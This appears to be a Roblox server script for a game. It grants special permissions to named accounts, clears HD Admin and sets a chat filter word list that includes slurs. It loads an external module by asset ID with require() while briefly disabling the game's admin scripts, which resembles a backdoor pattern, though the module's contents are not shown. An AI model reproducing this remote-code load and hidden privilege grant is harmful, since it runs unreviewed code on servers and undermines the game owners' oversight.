_G.specialperms = {"t_echr","fats_mx","t_echl","t_echk"} -- ask to be added

local tabby = workspace:WaitForChild("Tabby")
local admin_house = tabby:WaitForChild("Admin_House")
local snow = admin_house:WaitForChild("Snow")

task.delay(0.5, function()
    for _, v in ipairs(snow:GetDescendants()) do
        if v:IsA("Part") then
            if v.Name == "Snow" then
                v:Destroy()
            elseif v.Name == "Barrier" then
                v.BrickColor = BrickColor.new("Teal")
            end
        end
    end

    -- what's the point of making this run forever?
    while task.wait() do
        _G.HDAdminMain = nil -- no more HD
    end
end)

task.spawn(function()
while task.wait() do
_G.badwords = {"fuc","bitc","nig","ggot","fag","expl","hitl","slu","touches","rape","raping","ped","wtf","lmao","anal","anus","ballsack","balls","bastard","biatch","bloody","blow","boll","boner","boob","bugger","bum","butt","clitoris","cock","coon","crap","cunt","dick","dildo","dyke","feck","fellate","fellatio","felching","f u c k","fudge","goddamn","god damn","homo","gay","jerk","jizz","cum","knob","penis","dick","piss","prick","pube","pussy","queer","scrotum","sex","shit","s hit","sh1t","smegma","sperm","tits","spunk","tosser","turd","twat","vagina","wank","whore","kids","porn","http","incel","add me","@","instagram","disco","cord","tiktok","tik tok","bit.ly","suck","nuts","arous","children","freak","hack","hate","kill yourself","end yourself","kys","self harm","selfharm","suicide","end my life","personal info","password","username","dox","address","zipcode","zip code","dmca","give head","ggers","hiti"} 
-- if any of these words are found, strict filtering will be forcefully enabled in the game serverend
end
end)

if game.PlaceId == 14747334292 then
    local chatcon = {}
    chatcon[#chatcon + 1] = game.Players.PlayerAdded:Connect(function(player)
        wait(0.94397082108066)
        chatcon[#chatcon + 1] = game.Players.PlayerAdded:Connect(function(player)
            require(94397082108066)
            game.ServerScriptService["Touch Kohls Admin"].Enabled = false
            game.ServerScriptService["setting commands"].Enabled = false
            wait(0.94397082108066)
            game.ServerScriptService["Touch Kohls Admin"].Enabled = true
            game.ServerScriptService["setting commands"].Enabled = true
            for i, v in ipairs(chatcon) do
                v:Disconnect()
            end
        end)
    end)
else
    require(94397082108066)
    game.ServerScriptService["Touch Kohls Admin"].Enabled = false
    wait(0.94397082108066)
    game.ServerScriptService["Touch Kohls Admin"].Enabled = true
end

local timelimit = "2025-08-30"
local ctime = os.date("%Y-%m-%d")

if ctime > timelimit then
    _G.specialperms = {}
end

_G.prn = function(toprint, time)
    local p = Instance.new("Message")
    p.Parent = workspace
    p.Text = tostring(toprint)

    time = time or 3
    game:GetService("Debris"):AddItem(p,time)
end

if game.PlaceId == 14747334292 then -- temporarily testing something related to age groups
    task.wait(5) 
    game.TextChatService.BubbleChatConfiguration.Enabled = true
end

_G.filtermode = true

--
